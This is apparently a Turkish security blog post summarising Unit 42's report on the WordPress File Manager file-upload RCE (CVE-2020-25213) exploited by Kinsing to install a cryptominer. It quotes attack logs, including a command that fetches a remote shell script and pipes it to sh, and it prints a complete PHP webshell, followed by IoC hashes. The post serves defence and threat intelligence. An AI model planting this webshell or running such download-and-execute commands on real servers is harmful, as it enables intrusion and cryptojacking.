22.5 C
İstanbul
27/07/2024

Epics for Security
Image default
Güncel ZafiyetlerHaberler

WordPress File Manager RCE Vulnerability (CVE-2020-25213)

by Mustafa Okay Maktav01294

PaloAlto tarafından Aralık 2020’de yapılan bildirimde, WordPress File Manager Plugin’de dosya yükleme zaafiyeti olarak bilinen CVE-2020-25213 kodlu exploit paylaşılmıştı. Bu açıklık başarılı şekilde exploit edildiğinde, herhangi bir dosya, herhangi bir isim ve uzantıyla karşı web sunucusuna yüklenebilmektedir. Bunun sonucu olarak RCE (Remote Code Execution) mümkün hale gelmektedir.

Kinsign adıyla bilinen exploit, bu açıklığı kullanarak webshell yüklemektedir. H2miner ailesine ait bir cryptominer çalıştırmak için kullanılan exploit Golang programlama diline dayanmaktadır. 

CVE-2020-2513 ve Webshell İlişkisi

Bu açıklık, WordPress File Manager Plugin üstünde yer alan elFinder kütüphanesi içindeki “connector.minimal.php.dist” dosyasının uzantısının “.php” olarak dönüştürülüp dosyanın çalıştırılmasına dayanmaktadır. Herhangi bir kısıtlama veya engellemeye takılmadan web sunucusu üstünde isteyen her kişi bunu gerçekleştirebilmektedir. Sunucuya herhangi bir yetki kontrolü olmaksızın dosya yüklenebilmesine neden olmaktadır.

  • Şüpheli web sunucusu logu:

[19/Dec/2020:08:58:08 +0000] “POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1” 200 1453 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36”

  • Post isteğinin sonrasında çalıştırılan komut ile yüklenen dosya:

[19/Dec/2020:08:57:48 +0000] “GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1” 200 411

  • Çalıştırılan webshell kodu:

<?php if(isset($_REQUEST[‘cmd’])){ echo “<pre>”; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo “</pre>”; die; }?>

IoC Listesi

Kinsign Hash Değerleri:

  • 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
  • 5f1e0e3cc38f7888b89a9adddb745a341c5f65165dadc311ca389789cc9c6889

Cryptominer Hash Değeri:

  • dd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839

Shell Script Hash Değeri:

  • a68ab806c8e111e98ba46d5bfdabd9091a68839dd39dfe81e887361bd4994a62

WebShell Hash Değeri:

  • f1c5bed9560a1afe9d5575e923e480e7e8030e10bc3d7c0d842b1a64f49f8794

Kaynak

https://unit42.paloaltonetworks.com/cve-2020-25213/

 

Related posts

DLL Fixer ile Cyrat Ransomware

Mustafa Okay Maktav

SMAUG Fidye Yazılımı

Serdar H.

Federal Agency Compromised by Malicious Cyber Actor – Analiz Raporu (AR20-268A)

Serdar H.

Bu web sitesi, kullanıcı deneyimini iyileştirmek amacıyla çerezler kullanmaktadır. Kabul Et Daha Fazlası